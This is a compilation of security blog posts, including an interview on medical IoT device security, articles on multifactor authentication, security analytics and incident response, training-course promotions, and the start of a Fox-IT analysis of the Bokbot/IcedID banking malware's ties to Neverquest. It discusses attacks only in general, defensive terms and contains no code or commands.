Like leather upholstery for your new car, add-ons to your threat intelligence service are hard to resist. But Chris Camacho of Flashpoint* says “buyer beware:” threat intel add-ons may be more trouble than they’re worth. If you’ve ever shopped for a new car, you’re likely familiar with the dizzying number of add-on...

Read the whole entry... »

Related Stories

11 Expert Takes On Data Privacy Day 2019 You Need To Read

The Council of Europe agreed that January 28 should be declared European Data Protection Day back in 2007; two years later the U.S. joined in with the Data Privacy Day

The post 11 Expert Takes On Data Privacy Day 2019 You Need To Read appeared first on The Cyber Security Place.

The Threat Intelligence Market Segment – A Complete Mockery and IP Theft Compromise – An Open Letter to the U.S Intelligence Community

I recently came across to the most recently published DoD Cyberspace Strategy 2018 which greatly reminded me of a variety of resources that I recently took a look at in terms of catching up with some of the latest cyber warfare trends and scenarios. Do you want to be a cyber warrior? Do you want to "hunt down the bad guys"? Watch out - Uncle Sam is there to spank the very bottom of your digital

How Secure Are Medical IoT Devices? Catherine Norcom Has Her Finger on the Pulse of the Industry

At the IBM Security Summit in 2018, X-Force Red Global Head Charles Henderson told a memorable story. A colleague frantically reached out one Friday afternoon asking him to test five medical internet of things (IoT) devices. One of the devices was to be implanted in the colleague’s body, and he wanted to make sure he chose the most secure model. Charles immediately called his hacker friends, who happily agreed to help him with the research. Within a couple days, Charles recommended a specific model to his colleague, confident the model was the least hackable.

Unlike Charles’ colleague, most patients do not have someone on hand to test their medical IoT devices prior to implantation, which is why it’s critical for device manufacturers to build security into the devices from the earliest stages of development. Patients should be able to trust that the devices in their bodies have no critical vulnerabilities that criminals could potentially exploit.

A Q and A With ‘Q’: Reviewing the FDA’s Guidance on Medical IoT Devices

On Jan. 29–30, 2019, the Food and Drug Administration (FDA) will host a public workshop to discuss medical IoT security. The discussion will focus on the recently drafted guidance titled “Content of Premarket Submissions for Management of Cybersecurity in Medical Devices,” which aims to help strengthen cybersecurity across medical IoT devices.

Catherine Norcom, X-Force Red’s resident hardware hacker, specializes in building and testing IoT devices in the medical field. Catherine, also known as “Q,” recently joined the team after serving 10 years in the U.S. Air Force.

I chatted with Catherine about the FDA’s guidance, the top risks related to medical IoT devices and how to minimize those risks.

Question: Thank you for taking the time to chat today, Catherine. Which parts of the FDA’s guidance do you think may be most effective?

Catherine: I like the objective of the guidance. Manufacturers of medical IoT devices should be prioritizing security, especially considering the potential detrimental consequences of a breach. Specifically, I like the clause about logging people out after a period of inactivity. I also like the clause that discusses the need for rapid deployment of patches and updates.

However, that clause actually contradicts another clause in the guidance that recommends users approve any product updates before they are installed. That being said, in November 2018, the FDA provided more details on this topic, saying critical patches can and should be applied without user approval. I also think that’s an important update. After all, patient safety should not vary from user to user, simply based on whether they have the resources to process and deploy critical patches in a timely fashion. The FDA should include those details in the guidance.

I also like that the guidance promotes encrypting any information stored on devices and requires authentication of some kind before the user accesses medical information coming from the device. That way, if a user left a device on a bus, for example, someone else could not access the user’s private medical information.


Where do you think the guidance could be improved?

There are some parts that seemed like they could vary in meaning. For example, the guidance recommends assessing risk and mitigation throughout a product’s life cycle. However, manufacturers and end users can have different interpretations of what constitutes the life cycle of a product. Obviously, manufacturers will release newer versions of products, whether it’s because of their own innovations or due to external factors such as a pending update to a third-party operating system or plug-in that makes the existing product design a challenge to maintain.

When a manufacturer releases a new version of a product, they cannot continue to support all older versions of that product in the same manner they did before. But even after the manufacturer needs to end its support, the product may still work fine for some period. And even if it doesn’t work as well as it once did without manufacturer support, the user may choose to continue using and servicing it themselves. Although this is a difficult subject to address, it could be valuable if the guidance is able to spell out in more detail what the expectations are for manufacturers and users at different stages of a normal product life cycle. There are other FDA documents that include more details about this matter, but it should be spelled out in this guidance as well.

The guidance also uses buzzwords like “holistic.” Many manufacturers — and, frankly, people in general — do not know what that term means or else they could interpret it differently. Also, a part of the guidance recommends manufacturers identify vulnerabilities up front. This is both exceedingly nuanced and complex. For example, even if a manufacturer identified a vulnerability in the Wi-Fi connection, they may not know the USB port is also vulnerable. In this case, you need penetration testers to assess risk throughout the process – whether that’s hiring outside specialists or someone in-house. Penetration testers, who are hackers, understand the many different ways criminals may exploit individual vulnerabilities or chain them together to compromise a device. As such, testers can identify how criminals may exploit vulnerabilities – whether it’s one or many chained together – exposing a device and connected ecosystem.

Since X-Force Red specializes in cybersecurity, let’s pivot the conversation and discuss security risks that come with medical IoT devices.

Medical IoT devices are a top target of cybercriminals, so even if a manufacturer thinks it has developed a device with reasonable security, criminals may still find vulnerabilities. I recently read a Ponemon Institute study that said 67 percent of medical device makers believe an attack on one or more medical devices they have built is likely.

One of the most obvious points of vulnerability is if the user loses the device or the device is stolen. If criminals get physical access to the hardware, they may be able to access all of the medical data in that device. They could also potentially reverse engineer the device and in this way gain access to even more information that is stored on underlying servers. That information could aid in planning a larger attack against the device manufacturer or help criminals use patient identity in insurance fraud or other schemes.

Yes, physically stealing a device would provide the easiest pathway to compromising it. What about the risks related to the Wi-Fi connection used by most IoT devices?

Obviously, anything connected to Wi-Fi can potentially be compromised. A brute force attack is one of the more popular attack methods. The service set identifier (SSID) is the Wi-Fi network name you see when you try to connect. If a device broadcasts its SSID, for example, a criminal would see the device on the Wi-Fi network and may try every password under the sun until one grants him access. These attacks are typically automated by computers and it can take mere seconds to brute force a weak password.

Also, if the Wi-Fi connection from the device is not secured and the data stored on the device is not encrypted, a criminal could intercept the packets and access medical data as it moves from the device to the router. Essentially, a criminal could grab the device’s stored medical data as it moves through the air.

What about USB ports? Many medical IoT devices contain USB ports similar to those we use to charge our cellphones.

Yes, USB ports on medical IoT devices can be used to transfer data. If someone plugs into the device’s USB port and the stored data is unencrypted, the person could potentially access the data. It’s similar to your cellphone: If you plug a USB cable into your phone and connect it to a laptop, you can see the data on your phone and move it to your laptop.

As a rule, people should avoid connecting to any USB port they do not control. That means avoiding those in airports, airplanes, public places, etc. Behind every USB port, there can be a device reading data without explicit permission.


So, what can IoT medical device manufacturers do to strengthen the security of their products as they’re being developed?

First, developers should make sure the device’s SSID is hidden so it doesn’t show up on Wi-Fi networks. Also, IoT manufacturers will oftentimes give all their devices the same SSID. For example, devices that are meant for the kitchen will have the SSID “kitchen.” If devices have the same SSID, then a criminal can connect to them even if they are hidden. It’s crucial that devices have unique SSIDs and preferably let their owners name them to create random names that attackers won’t be able to readily look up.

Good security practices for an application programming interface (API)-enabled device include making sure a criminal doesn’t have access to the API key — which is like a password — so that he or she can’t read the private medical data that the medical device is logging.

An easy and obvious recommendation is to use encryption. Any data on the device and the connection to the wireless hotspot or cell phone should be encrypted. Encryption will disable criminals’ ability to read private data whether they steal packets or plug into a USB port. Manufacturers can also make proprietary software that only talks to the specific IoT device and enables it to securely decrypt the data on it.

It’s also critical to have a secure connection between the device and Wi-Fi access point you are using. The device should not connect to anything that doesn’t require authentication.

Finally, manufacturers must test their hardware and software as the device is being developed. Manual penetration testing can uncover unknown vulnerabilities that automated tools may not find. For example, testers can determine whether the software was programmed in a way that makes files difficult to read. As they are writing and developing the device and its software, manufacturers should consult a security expert at every step, from selecting products to testing during development, and test after the device is built.

Any last words or recommendations for the FDA as it works to finalize the guidance?

Unfortunately, hacking an IoT device, medical and nonmedical, is oftentimes not that difficult. At the DEF CON hacker conference, people with little experience were hacking IoT coffee pots and voting booths in minutes. When you allow an IoT device on your network, if the device has a vulnerability, a criminal can easily compromise your entire network. That’s why it’s critical for all IoT manufacturers to prioritize security when developing their products.

This guidance is a step in the right direction to achieving that goal. It gives some really strong recommendations and places a focus on the subject of IoT security. The FDA is inviting comments from medical device and component manufacturers, independent researchers and security firms, which will be extremely beneficial in shaping the final draft. It’s always encouraging to see the security world’s perspective being brought into the development of this kind of guidance.

Listen to the X-Force Red in Action Podcast Series

The post How Secure Are Medical IoT Devices? Catherine Norcom Has Her Finger on the Pulse of the Industry appeared first on Security Intelligence.

Multifactor Authentication Delivers the Convenience and Security Online Shoppers Demand

Another holiday shopping season has ended, and for exhausted online consumers, this alone is good news. The National Retail Federation (NRF), the world’s largest retail trade association, reported that the number of online transactions surpassed that of in-store purchases during Thanksgiving weekend in the U.S. Online shopping is a growing, global trend that is boosted by big retailers and financial institutions.

However, according to a Javelin Strategy & Research study, many consumers remain skeptical about the security of online shopping and mobile banking systems. While 70 percent of those surveyed said they feel secure purchasing items from a physical store, the confidence level dropped to 56 percent for online purchases and 50 percent for mobile banking. How can retailers increase customer trust toward online transactions?

Security Versus Convenience: The Search for Equilibrium Continues

When we register for online services, we implicitly balance security and convenience. When we’re banking and shopping online, the need for security is greater. We are willing to spend more time to complete a transaction — for example, by entering a one-time password (OTP) received via SMS — in exchange for a safer experience. On the other hand, convenience becomes paramount when logging into social networks, often at the expense of security.

App or account types respondents cared most to protect

(Source: IBM Future of Identity Study 2018)

A growing number of users are finding the right balance between convenience and security in biometric authentication capabilities such as fingerprint scanning and facial recognition. Passwords have done the job so far, but they are destined for an inexorable decline due to the insecurity of traditional authentication systems.

According to the “IBM Future of Identity Study 2018,” a fingerprint scan is perceived as the most secure authentication method, while alphanumeric passwords and digital personal identification numbers (PINs) are decidedly inferior. However, even biometrics have their faults; there is already a number of documented break-ins, data breaches, viable attack schemes and limitations. For instance, how would facial recognition behave in front of twins?

The Future of Identity Verification and Multifactor Authentication

Multifactor authentication (MFA) represents a promising alternative. MFA combines multiple authentication factors so that if one is compromised, the overall system can remain secure. The familiar system already in use for many online services — based on the combination of a password and an SMS code to authorize a login or transaction — is a simple example of two-factor authentication (2FA).

Authentication factors that are not visible, such as device fingerprinting, geolocation, IP reputation, device reputation and mobile network operator (MNO) data, can contribute substantially to identity verification. Some threat intelligence platforms can already provide most of this information to third-party applications and solutions. These elements add context to the user and device used for the online transaction and assist in quantifying the risk level of each operation.

The new available features open the way to context-based access, which conditions access to the dynamic assessment of the risk associated with a single transaction, modulating additional verification actions when the risk level becomes too great.

Existing technologies for context-based access allow security teams to:

  • Register the user’s device, silently or subject to consent, and promptly identify any device substitution or attempt to impersonate the legitimate device;
  • Associate biometric credentials to registered devices, thus binding the legitimate device, user and online application;
  • Spot known users accessing data from unregistered devices and require additional authentication steps;
  • Move to passwordless login, based on scanning a time-based QR code without typing a password;
  • Verify the user presence, limiting the effectiveness of reply attacks and other automated attacks;
  • Use an authenticator app to access online services with 2FA that leverages the biometric device on the smartphone, such as the fingerprint reader, and stores biometric data only on the user’s device;
  • Use advanced authentication mechanisms, such as FIDO2, which standardizes the use of authentication devices for access to online services in mobile and desktop environments; and
  • Calculate the risk value for a transaction based on the user’s behavioral patterns.

Combining all these elements, context-based access solutions conduct a dynamic risk assessment of each transaction. The transaction risk score, compared against predefined policies, can allow or block an operation or request additional authentication elements.

Get Your Customers Excited About Security

The aforementioned “IBM Future of Identity Study 2018” revealed clear demographic, geographic and cultural differences regarding the acceptance of authentication methods. It is therefore necessary to favor the adoption of next-generation authentication mechanisms and other emerging alternatives to traditional passwords.

Imposing a particular method of identity verification in the name of improved security can lead to user frustration, missed opportunities and even loss of customers. Instead, you should present new authentication mechanisms as more practical and convenient — that way, your customers will perceive it as a step toward innovation and progress rather than an impediment. If your authentication method feels “cool,” your users will be more excited to show it to colleagues and friends and less frustrated with a clunky login experience. You may even want to consider offering a wide range of authentication options and letting your users choose which they prefer.

Multifactor authentication is here to stay as traditional passwords lose favor with both security professionals and increasingly privacy-aware customers. If retailers can frame these new techniques in a way that gets users excited about security, the future of identity verification in the industry looks bright.

The post Multifactor Authentication Delivers the Convenience and Security Online Shoppers Demand appeared first on Security Intelligence.

Stay Ahead of the Growing Security Analytics Market With These Best Practices

As breach rates climb and threat actors continue to evolve their techniques, many IT security teams are turning to new tools in the fight against corporate cybercrime. The proliferation of internet of things (IoT) devices, network services and other technologies in the enterprise has expanded the attack surface every year and will continue to do so. This evolving landscape is prompting organizations to seek out new ways of defending critical assets and gathering threat intelligence.

The Security Analytics Market Is Poised for Massive Growth

Enter security analytics, which mixes threat intelligence with big data capabilities to help detect, analyze and mitigate targeted attacks and persistent threats from outside actors as well as those already inside corporate walls.

“It’s no longer enough to protect against outside attacks with perimeter-based cybersecurity solutions,” said Hani Mustafa, CEO and co-founder of Jazz Networks. “Cybersecurity tools that blend user behavior analytics (UBA), machine learning and data visibility will help security professionals contextualize data and demystify human behavior, allowing them to predict, prevent and protect against insider threats.”

Security analytics can also provide information about attempted breaches from outside sources. Analytics tools work together with existing network defenses and strategies and offer a deeper view into suspicious activity, which could be missed or overlooked for long periods due to the massive amount of superfluous data collected each day.

Indeed, more security teams are seeing the value of analytics as the market appears poised for massive growth. According to Global Market Insights, the security analytics market was valued at more than $2 billion in 2015, and it is estimated to grow by more than 26 percent over the coming years — exceeding $8 billion by 2023. ABI Research put that figure even higher, estimating that the need for these tools will drive the security analytics market toward a revenue of $12 billion by 2024.

Why Are Security Managers Turning to Analytics?

For most security managers, investment in analytics tools represents a way to fill the need for more real-time, actionable information that plays a role in a layered, robust security strategy. Filtering out important information from the massive amounts of data that enterprises deal with daily is a primary goal for many leaders. Businesses are using these tools for many use cases, including analyzing user behavior, examining network traffic, detecting insider threats, uncovering lost data, and reviewing user roles and permissions.

“There has been a shift in cybersecurity analytics tooling over the past several years,” said Ray McKenzie, founder and managing director of Red Beach Advisors. “Companies initially were fine with weekly or biweekly security log analytics and threat identification. This has morphed to real-time analytics and tooling to support vulnerability awareness.”

Another reason for analytics is to gain better insight into the areas that are most at risk within an IT environment. But in efforts to cull important information from a wide variety of potential threats, these tools also present challenges to the teams using them.

“The technology can also cause alert fatigue,” said Simon Whitburn, global senior vice president, cybersecurity services at Nominet. “Effective analytics tools should have the ability to reduce false positives while analyzing data in real-time to pinpoint and eradicate malicious activity quickly. At the end of the day, the key is having access to actionable threat intelligence.”

Personalization Is Paramount

Obtaining actionable threat intelligence means configuring these tools with your unique business needs in mind.

“There is no ‘plug and play’ solution in the security analytics space,” said Liviu Arsene, senior cybersecurity analyst at Bitdefender. “Instead, the best way forward for organizations is to identify and deploy the analytics tools that best fits an organization’s needs.”

When evaluating security analytics tools, consider the company’s size and the complexity of the challenges the business hopes to address. Organizations that use analytics may need to include features such as deployment models, scope and depth of analysis, forensics, and monitoring, reporting and visualization. Others may have simpler needs with minimal overhead and a smaller focus on forensics and advanced persistent threats (APTs).

“While there is no single analytics tool that works for all organizations, it’s important for organizations to fully understand the features they need for their infrastructure,” said Arsene.

Best Practices for Researching and Deploying Analytics Solutions

Once you have established your organization’s needs and goals for investing in security analytics, there are other important considerations to keep in mind.

Emphasize Employee Training

Chief information security officers (CISOs) and security managers must ensure that their staffs are prepared to use the tools at the outset of deployment. Training employees on how to make sense of information among the noise of alerts is critical.

“Staff need to be trained to understand the results being generated, what is important, what is not and how to respond,” said Steve Tcherchian, CISO at XYPRO Technology Corporation.

Look for Tools That Can Change With the Threat Landscape

Security experts know that criminals are always one step ahead of technology and tools and that the threat landscape is always evolving. It’s essential to invest in tools that can handle relevant data needs now, but also down the line in several years. In other words, the solutions must evolve alongside the techniques and methodologies of threat actors.

“If the security tools an organization uses remain stagnant in their programming and update schedule, more vulnerabilities will be exposed through other approaches,” said Victor Congionti of Proven Data.

Understand That Analytics Is Only a Supplement to Your Team

Analytics tools are by no means a replacement for your security staff. Having analysts who can understand and interpret data is necessary to get the most out of these solutions.

Be Mindful of the Limitations of Security Analytics

Armed with security analytics tools, organizations can benefit from big data capabilities to analyze data and enhance detection with proactive alerts about potential malicious activity. However, analytics tools have their limitations, and enterprises that invest must evaluate and deploy these tools with their unique business needs in mind. The data obtained from analytics requires context, and trained staff need to understand how to make sense of important alerts among the noise.

The post Stay Ahead of the Growing Security Analytics Market With These Best Practices appeared first on Security Intelligence.

Need a Sounding Board for Your Incident Response Plan? Join a Security Community

Incident response teams face myriad uphill battles, such as the cybersecurity skills shortage, floods of security alerts and increasing IT complexity, to name just a few. These challenges often overwhelm security teams and leave security operations center (SOC) directors searching for strategies to maximize the productivity of their current team and technologies to build a capable incident response plan.

One emerging solution is a familiar one: an ecosystem of developer and expert communities. Collaborative online forums have always been a critical part of the cybersecurity industry, and communities dedicated to incident response are growing more robust than ever.

How to Get Involved in a Developer Community

Incident response communities can be a crucial resource to give security analysts access to hands-on, battle-tested experience. They can deliver highly valuable, lightweight, easy-to-use integrations that can be deployed quickly. Community-driven security can also provide playbooks, standard operating procedures (SOPs), best practices and troubleshooting tips. Most importantly, they can help foster innovation by serving as a sounding board for your team’s ideas and introduce you to new strategies and techniques.

That all sounds great, but how do you know what community can best address your incident response needs? Where do you begin? Below are a few steps to help you get started.

1. Find the Communities That Are Most Relevant to You

To combat new threats that are being coordinated in real time, more and more vendors and services are fostering their own communities. Identify which ones are most relevant to your industry and business goals.

To start, narrow down your search based on the security products you use every day. In all likelihood, you’ll find users in these product-based communities who have faced similar challenges or have run into the same issues as your team.

Once you’ve selected the most relevant communities, make sure you sign up for constant updates. Join discussion forums, opt in to regular updates, and check back frequently for new blogs and other content. By keeping close tabs on these conversations, you can continuously review whether the communities you’ve joined are still relevant and valuable to your business.

2. Identify Existing Gaps in Your Security Processes

Communities are disparate and wide-ranging. Establishing your needs first will save you time and make communities more valuable to you. By identifying what type of intelligence you need to enhance your security strategy and incident response plan ahead of time, you can be confident that you’re joining the right channels and interacting with like-minded users.

Discussion forums are full of valuable information from other users who have probably had to patch up many of the same security gaps that affect your business. These forums also provide a window into the wider purpose of the community; aligning your identified gaps with this mission will help you maximize the value of your interactions.

3. Contribute to the Conversation

By taking part in these conversations, you can uncover unexpected benefits and give your team a sounding board among other users. As a security practitioner, it should be a priority to contribute direct and honest information to the community and perpetuate an industrywide culture of information sharing. Real-time, responsive feedback is a great tool to help you build a better security strategy and align a response plan to the current threat landscape.

Contributing to a community can take various forms. Community-based forums and Slack channels give developers a voice across the organization. By leveraging this mode of communication, you can bring important intelligence to the surface that might otherwise go under the radar. Forum discussions can also expose you to new perspectives from a diverse range of sources.

A Successful Incident Response Plan Starts With Collaboration

For its part, IBM Security gathers insights from experienced users across all its products in the IBM Security Community portal. Through this initiative, IBM has expanded its global network to connect like-minded people in cybersecurity. This collaborative network allows us to adapt to new developments as rapidly as threats evolve.

Collaboration has always been cybercriminals’ greatest weapon. It creates massive challenges for the cybersecurity industry and requires us to fight back with a united front of our own. With the support of an entire security community behind you, incident response tasks won’t seem so overwhelming and your resource-strapped SOC will have all the threat data it needs to protect your business.

Discover Community Day at Think 2019

The post Need a Sounding Board for Your Incident Response Plan? Join a Security Community appeared first on Security Intelligence.

Advance Your Blue Teaming Skills with IHRP

The Incident Handling & Response Professional (IHRP) training course is now available for enrollment. Discover this course’s details and see how you can benefit from it to better your defensive skills and become the IR professional companies wish they had.

In today’s hyper-connected world where everyone is a target to cybercriminals, organizations are fighting tooth and nails to find skilled cybersecurity professionals. While it’s a great asset to have red-teaming skills, companies expect their IT Security teams to not only know how to defend and assist in cases of malicious intrusions but also to have the right skills to hunt and secure them from such events in the first place. If you’re reading this because you’re interested in learning more and/or switching to the blue side of security, then IHRP might just be the right training course for you.

Incident Handling & Response Professional (IHRP) 

The Incident Handling & Response Professional (IHRP) training course is self-paced and highly hands-on. Here are some of the benefits of this course modules:

  • Documents how to set up an incident handling & response capability
  • Analyzes in-detail how attackers operate and how to detect each Technique, Tactic, and Procedure they use
  • Covers detecting intrusions or intrusion attempts during all stages of the Cyber Kill Chain
  • Showcases a variety of different intrusion detection techniques such as: analyzing traffic, flows, and endpoints, as well as performing correlations and endpoint or protocol analytics
  • Covers how to effectively utilize and fine-tune open-source IDS solutions (Snort, Bro, Suricata etc.)
  • Makes students capable of making the best of open-source SIEM solutions (ELK stack, Splunk, Osquery etc.)
  • Showcases how tactical threat intelligence can enhance your detection capabilities
  • Documents how to leverage baselines for effective intrusion detection
  • Provides students with real-life incident response scenarios

Want to know more? Discover the detailed syllabus here.

Why You Should Consider IHRP
  • Hands-on and real-life scenario labs: There is no substitute for learning IT Security hands-on, just like learning how to drive a car. You have to sit in it to fully learn the skills. All the labs of this training course simulate real-life scenarios.
  • Hours of video course materials: Videos help illustrate and understand complicated topics from the course slides more easily
  • Thousands of course slide materials: Interactive learning at your own speed, skipping back and forth to fully understand each topic before practicing labs and/or taking your exam. Slides will always be available to you in your member’s area.
  • Lifetime access to the course materials: Nobody can remember everything, you can always come back to double check on something you learned.
  • Exam voucher to get certified included: There is no additional cost or headache to get certified. Your course content in the Full and Elite Editions covers everything that is needed to pass the exam.
  • Online learning: You can obtain both the theoretical and practical skills from the comfort of your own home or office. A major benefit is that you can decide when to learn, and you can do so at your own speed. This also saves time and additional cost for travel and accommodation.

Get Early Access & 50% Off Your Course Fees

Interested in learning everything blue-team? Enjoy 50% off the new IHRP training course fees in Elite Edition when you enroll before December 31, 2018.  This early access offer will grant you immediate access to the first two modules, ‘Incident Handling Process’ and ‘Intrusion Detection by Analyzing Traffic’, and hands-on labs in which you will be tasked with detecting real-world attacks and malware. New content will be added automatically in your member’s area every two weeks, as it becomes available. Enrollments after January 1st will be closed until the final release of this training course in March.

Interested in this blue teaming course? Enroll before December 31st and get 50% off your course fees discounted automatically on the checkout page 😉


Connect with us on Social Media:

Twitter | Facebook | LinkedIn | Instagram

The 4 Steps Of Incident Handling & Response

An estimated 3.6 billion records were breached in the first 9 months of 2018 alone. While these numbers show some improvement, cyber incidents will inevitably continue to happen. For that, security professionals need to know the Incident Handling and Response processes.

According to NIST’s Computer Security Incident Handling Guide, the Incident Response (IR) life cycle is made of 4 phases, as shown below.

1. Preparation

In this initial phase, organizations plan to handle incidents and attempt to limit the number of potential incidents by selecting and implementing a set of controls based on the results of risk assessments. This step involves outlining everyone’s responsibility, hardware, tools, documentation, etc. and taking steps to reduce the possibility of an incident happening.

2. Detection & Analysis

In this phase, the IR team analyzes all the symptoms reported and confirms whether or not the situation would be classified as an incident.

3. Containment, Eradication, and Recovery
In this phase, The IR team now gathers intel and create signatures that will help them identify each compromised system. With this information, the organization can mitigate the impact of incidents by containing them and countermeasures can be put in place to neutralize the attacker and restore systems/data back to normal.
4. Post-incident Activities

This is more of a ‘lesson learned’ phase. Its goal is to improve the overall security posture of the organization and to ensure that similar incidents won’t happen in the future.

When incidents happen, we tend to panic and wonder “what now?”. It’s important to remain calm and follow best practices and company procedures. For this reason, NIST has published its Computer Security Incident Handling Guide to lead you through the preparation, detection, handling, and recovery steps of Incident Handling & Response.

Interested in learning how to professionally analyze, handle, and respond to security incidents on heterogeneous networks and assets? Check out our new Incident Handling & Response Professional – IHRP – training course.

Connect with us on Social Media

Twitter Facebook LinkedIn Instagram

Searching for Cisco Umbrella Alternatives? Your Affordable Option for DNS Security with Advanced Reporting.

Looking for an affordable alternative to Cisco Umbrella Enterprise's high cost? ThreatSTOP comes with advanced reporting and security research tools out-of-the-box. See blocked threats, remediate client machines faster and check IOC’s. Here's a breakdown of how ThreatSTOP and Cisco line up.

Introducing Incident Handling & Response Professional (IHRP)

We are introducing the Incident Handling & Response Professional (IHRP) training course on December 11, 2018. Find out more and register for an exciting preview webinar.

No matter the strength of your company’s defense strategy, it is inevitable that security incidents will happen. Poor and/or delayed incident response has caused enormous damages and reputational harm to Yahoo, Uber, and most recently Facebook, to name a few. For this reason, Incident Response (IR) has become a crucial component of any IT Security department and knowing how to respond to such events is growing to be a more and more important skill.

Aspiring to switch to a career in Incident Response? Here’s how our new Incident Handling & Response Professional (IHRP) training course can help you learn the necessary skills and techniques for a successful career in this field.

Incident Handling & Response Professional (IHRP) 

The Incident Handling & Response Professional course (IHRP) is an online, self-paced training course that provides all the advanced knowledge and skills necessary to:

  • Professionally analyze, handle and respond to security incidents, on heterogeneous networks and assets
  • Understand the mechanics of modern cyber attacks and how to detect them
  • Effectively use and fine-tune open source IDS, log management and SIEM solutions
  • Detect and even (proactively) hunt for intrusions by analyzing traffic, flows and endpoints, as well as utilizing analytics and tactical threat intelligence

This training is the cornerstone of our blue teaming course catalog or, as we called it internally, “The PTP of Blue Team”.

Discover This Course & Get An Exclusive Offer

Take part in an exciting live demonstration and discover the complete syllabus of our latest course, Incident Handling & Response Professional (IHRP), on December 11. During this event, all the attendees will get their hands on an exclusive launch offer. Stay tuned! 😉

Be the first to know all about this modern blue teaming training course, join us on December 11.

Connect with us on Social Media:

Twitter | Facebook | LinkedIn | Instagram

Top 10 Skills Every Purple Teamer Must Have

Today, cyber threats are created faster and are in a more sophisticated manner than ever before. Bad actors are ready to go the extra mile to get their hands on all types of organizations, industries, and information. So, in a hyper-connected world where everyone is a target, what are the top skills purple teamers need to have? Find out.
Top 10 Skills Every Purple Teamer Must Have
  1. Web Application Penetration Testing — It is the process of using penetration testing techniques on a web application to detect its vulnerabilities before cybercriminals do.
  2. Mobile Penetration Testing — Mobile apps are becoming an increasing asset for businesses, but a threat at the same time. To make sure customers’ data is secure, mobile apps need to be tested for vulnerabilities as well.
  3. WiFi Penetration Testing —  A compromised wifi puts an entire’s organization network at risk. WiFi penetration testing is a crucial skill for IT Security professionals in 2018, and hiring managers know it.
  4. Advanced Social Engineering — Knowing the various means by which attackers can use social engineering techniques to gain access to an organization’s data is a great skill for all security professionals. You’ll need to be aware of the psychology and technical elements involved in phishing, vishing, baiting, etc.
  5. Advanced Adversary Simulation — By performing security assessments that simulate adversary attacks, an organization’s security is put to the test — from inside out, and focused on what attackers can get access to when successfully penetrating an organization’s environment.
  6. Defense Evasion — Defense Evasion is a tactic an adversary may use to bypass an information security device in order to ‘evade’ detection, or other defenses. Needless to say, it’s a red-teamer’s essential skill too.
  7. Threat Hunting — Threat Hunting skills come with knowing how to proactively search through networks to detect and isolate advanced threats that may have evaded existing security solutions.
  8. Threat Intelligence — By knowing how to analyze internal and external threats an organization may face, you are gathering threat intelligence. This knowledge will then help you make more informed decisions on potential remediation solutions, plans, etc.
  9. Incident Response — Incident response skills come with being able to address and manage the aftermath of a security breach or cyber attack. This comes in handy in a world where an attack happens every 39 seconds on average.
  10. Endpoint Monitoring — Endpoints are typically the initial target because they provide an entry point to the network, and therefore, access to the data attackers want. Knowing how to thoroughly monitor those endpoints and detect unknown threats is a valuable skill for any IT security professional to have.
How Can You Get There?

The purple teamer training path was designed as a guide for you to become equally skilled in both advanced offensive and defensive security techniques. This training path includes the latest versions of our Penetration Testing Professional (PTP), Penetration Testing Extreme (PTX), and Threat Hunting Professional (THP) training courses. Dive into the Purple Teamer path with a free demo of each course and see for yourself!

Click on the icons below to request your free demos:

Special Offer — Until November 30, 2018

If you are just beginning in this field, or if you feel that you need to review the penetration testing basics, we’re offering a free Penetration Testing Student (PTS) training course in Elite Edition with every enrollment in the PTP training course in Elite Edition until November 30, 2018.

Learn more about this offer, or click below to get started NOW.

Connect with us on Social Media

Twitter Facebook LinkedIn Instagram

Bokbot: The (re)birth of a banker

This blogpost is a follow-up to a presentation with the same name, given at SecurityFest in Sweden by Alfred Klason.


Bokbot (aka: IcedID) came to Fox-IT’s attention around the end of May 2017 when we identified an unknown sample in our lab that appeared to be a banker. This sample was also provided by a customer at a later stage.

Having looked into the bot and the operation, the analysis quickly revealed that it’s connected to a well-known actor group that was behind an operation publically known as 76service and later Neverquest/Vawtrak, dating back to 2006.

Neverquest operated for a number of years before an arrest lead to its downfall in January 2017. Just a few months afterwards we discovered a new bot, with a completely new code base but based on ideas and strategies from the days of Neverquest. Their business ties remains intact as they still utilize services from the same groups as seen before but also expanded to use new services.

This suggests that at least parts of the group behind Neverquest is still operating using Bokbot. It’s however unclear how many of the people from the core group that have continued on with Bokbot.

Bokbot is still a relatively new bot, just recently reaching a production state where they have streamlined and tested their creation. Even though it’s a new bot, they still have strong connections within the cybercrime underworld which enables them to maintain and grow their operation such as distributing their bot to a larger number of victims.

By looking back in history and the people who are behind this, it is highly likely that this is a threat that is not going away anytime soon. Fox-IT rather expects an expansion of both the botnet size and their target list.

76service and Neverquest

76service was, what one could call, a big-data mining service for fraud, powered by CRM (aka: Gozi). It was able to gather huge amounts of data from its victims using, for example, formgrabbing where authorization and log-in credentials are retrieved from forms submitted to websites by the infected victim.

76service panel login page (source:

76service login page (source:

The service was initially spotted in 2006 and was put into production in 2007, where the authors started to rent out access to their platform. When given access to the platform, the fraudulent customers of this service could free-text search in the stolen data for credentials that provide access to online services, such as internet banking, email accounts and other online platforms.

76service operated uninterrupted until November 2010, when an Ukrainian national named Nikita Kuzmin got arrested in connection with the operation. This marked the end of the 76service service.

Nice Catch! – The real name of Neverquest

A few months before the arrest of Nikita he shared the source code of CRM within a private group of people which would enable them to continue the development of the malware. This, over time, lead to the appearance of multiple Gozi strains, but there was one which stood out more than the others, namely: Catch.

Catch was the name given internally by the malware authors, but to the security community and the public it was known as Vawtrak or Neverquest.

During this investigation into Catch it became clear that 76service and Catch shared several characteristics. They both, for example, separated their botnets into projects within the panel they used for administering their infrastructure and botnets. Instead of having one huge botnet, they assigned every bot build with a project ID that would be used by the bot to let the Command & Control (C2) server know which specific project the bot belonged to.

76service and Catch also shared the same business model, where they shifted back and forth between a private and rented model.

The private business model meant that they made use of their own botnet, for their own gain, and the rented business model meant that they rented out access to their botnet to customers. This provided them with an additional income stream, instead of only performing the fraud themselves.

The shift between business models could usually be correlated with either: backend servers being seized or people with business ties to the group being arrested. These types of events might have spooked the group as they limited their infrastructure, closing down access for customers.

For the sake of simplicity, Catch will from here on be referred to as Neverquest in this post.

“Quest means business” – Affiliations

If one would identify a Neverquest infection it might not be the only malware that is lurking on the infected system. Neverquest has been known to cooperate with other crimeware groups, either to distribute additional malware or use existing botnets to distribute Neverquest.

During the investigation and tracking of Neverquest Fox-IT identified the following ties:

Crimeware/malware group Usage/functionality
Dyre Download and execute Dyre on Neverquest infections
TinyLoader & AbaddonPOS Download and execute TinyLoader on Neverquest infections. TinyLoader was later seen downloading AbaddonPOS (as mentioned by Proofpoint)
Chanitor/Hancitor Neverquest leverages Chanitor to infect new victims.

